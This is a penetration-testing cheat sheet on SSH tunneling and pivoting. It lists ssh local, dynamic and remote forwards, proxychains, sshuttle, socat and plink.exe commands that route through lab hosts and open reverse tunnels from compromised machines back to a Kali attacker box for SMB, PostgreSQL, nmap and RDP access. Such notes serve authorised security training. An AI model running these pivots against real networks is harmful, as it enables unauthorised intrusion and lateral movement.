SSH Tunneling

Local Port Forwarding

System	IP address
LHOST	192.168.50.10
APPLICATION SERVER	192.168.100.10
DATABASE SERVER	10.10.100.20
WINDOWS HOST	172.16.50.10

• LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

Application Server

ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <USERNAME>@10.10.100.20

Kali

smbclient -p 4455 //192.168.50.10/<SHARE> -U <USERNAME>

Dinamic port Forwarding

Application Server

ssh -N -D 0.0.0.0:9999 <USERNAME>@10.10.100.20

Kali

Edit the /etc/proxychains4.conf file

socks5 192.168.100.10 9999

Try the connexion

sudo proxychains smbclient //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>

Remote port Forward

Kali

sudo systemctl start ssh
sudo ss -tulpn

Application Server

ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 <USERNAME>@192.168.50.10

Kali

psql -h 127.0.0.1 -p 2345 -U postgres

Remote Dynamic Port Forwarding

Application Server

ssh -N -R 9998 <USERNAME>@192.168.50.10

Kali

Edit the /etc/proxychains4.conf file

socks5 127.0.0.1 9998

Try the connexion

sudo proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20

Using Shuttle

Application Server

socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22

Kali

sshuttle -r <USERNAME>@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24
smbclient -L //172.16.50.10/ -U <USERNAME> --password=<PASSWORD>

ssh.exe

Kali

sudo systemctl start ssh
xfreerdp /u:<user> /p:<pass> /v:<ip>

Windows Machine

where ssh
ssh -N -R 9998 kali@<ip_kali>

Kali

ss -ntplu

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998

proxychains psql -h 10.4.50.215 -U postgres

plink.exe

Kali

Upload plink.exe

find / -name plink.exe 2>/dev/null
/usr/share/windows-resources/binaries/plink.exe

Windows Machine

plink.exe -ssh -l <USERNAME> -pw <PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 <kali_ip>

Kali

ss -tulpn
xfreerdp3 /u:<USERNAME> /p:<PASSWORD> /v:127.0.0.1:9833